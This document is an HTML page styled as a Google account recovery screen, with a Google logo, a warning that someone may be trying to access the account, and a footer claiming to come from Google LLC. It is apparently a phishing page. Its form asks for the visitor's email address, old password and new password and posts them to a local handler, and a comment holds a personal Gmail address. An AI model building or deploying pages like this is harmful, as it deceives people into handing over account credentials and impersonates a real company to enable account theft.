<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Recover Your account</title>
    <!-- <link rel="stylesheet" href="bootstrap/bootstrap.css"> -->
    <link rel="stylesheet" href="css/styles.css">
  </head>
  <body class="body2">
    <!-- <div class="drya"> -->





  <div class="important">
    <img class="ryaim" src="imagesgmail/google1.png" alt="">
    <!-- <h3 class="h3recover"><img class="imagaccount" src="imagesgmail/googleimagep22.jpg" alt="">Christianogbonna247@gmail.com</h3> -->


    <!-- <h3 class="tc">To comfirm that this is you,enter your old password
    and create a new strong password. Someone might be trying to gain access to your account.
    <hr class="secondline"></h3> -->
    <div class="recovery-form-amend" >
    <div class="notice">
        <p >To comfirm that this is you,enter your old password
          and create a new strong password. Someone might be trying to gain access to your account.</p>
      </div>

      <form  action="recover-your-account" method="post">
     
        <div class="oldpassword">
          <input  class="text-input" type="email" name="email" placeholder="Your email" required autofocus>
        </div>
        <div class="oldpassword">
          <input  class="text-input" type="password" name="oldPassword" placeholder="Old password" required autofocus>
        </div>
        <div class="newpassword">
          <input class="text-input" type="password" name="newPassword" placeholder="New password" required autofocus>
        </div>
        
        <!-- <button type="submit" class="btn btn-large btn-primary">Submit</button> -->
        <a style="color: #fff; background-color: blue;" href="security-check-completed.html">submit</a>

    
      </form>

  </div>
  
</div>
<div class="copyright">
  <p>You received this email to let you know about important changes to your Google Account and services.
    © 2020 Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</p>
</div>
</div>



  </body>
</html>
